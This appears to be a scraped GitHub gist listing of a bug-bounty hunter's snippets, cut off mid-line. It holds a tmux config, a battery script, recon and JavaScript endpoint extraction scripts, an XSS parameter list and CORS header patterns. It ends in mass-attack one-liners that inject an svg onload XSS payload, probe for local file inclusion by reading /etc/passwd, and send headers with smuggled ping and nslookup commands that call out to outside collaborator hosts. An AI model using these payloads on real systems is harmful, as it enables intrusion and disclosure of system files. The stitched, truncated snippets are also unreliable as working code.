set -g mouse on
# unbind default prefix and set it to ctrl-a
unbind C-b
set -g prefix C-a
bind C-a send-prefix
# make delay shorter
set -sg escape-time 0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
battery_status=$(acpi | awk '{print $3}') | |
battery_percentage=$(acpi | awk '{print $4}' | sed 's/,//') | |
if [ "$battery_status" == "Discharging," ]; then | |
icon="🔋" | |
else | |
icon="🔌" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env zsh | |
rm ~/recon -rf | |
mkdir ~/recon | |
cd ~/recon | |
curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json" | |
cat chaos-bugbounty-list.json | jq -r '.programs[].name' | while read folder; do mkdir -p "$folder"; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -L -k -s $1 | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
# using linkfinder | |
function ejs() { | |
URL=$1; | |
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'" | |
} | |
# with file download (the new best one): | |
# but there is a bug if you don't provide a root url |
use std::io::{self, BufRead, Read, Write};
use std::net::TcpStream;
use std::str;
fn extract_urls(body: &str) -> Vec<&str> {
let mut urls = vec![];
for line in body.lines() {
if let Some(start) = line.find("src=") {
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"XSS": [ | |
"q=", | |
"s=", | |
"search=", | |
"lang=", | |
"keyword=", | |
"query=", | |
"page=", | |
"keywords=", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"flags": "-HnriE", | |
"patterns": [ | |
"Access-Control-Allow-Origin: *", | |
"Access-Control-Allow-Methods: *", | |
"Access-Control-Allow-Headers: *", | |
"Access-Control-Allow-Credentials: true", | |
"Access-Control-Expose-Headers: *", | |
"Access-Control-Max-Age: *" | |
] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done | |
assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' | |
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done | |
### DNS rebinding for RCE | |
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H |
NewerOlder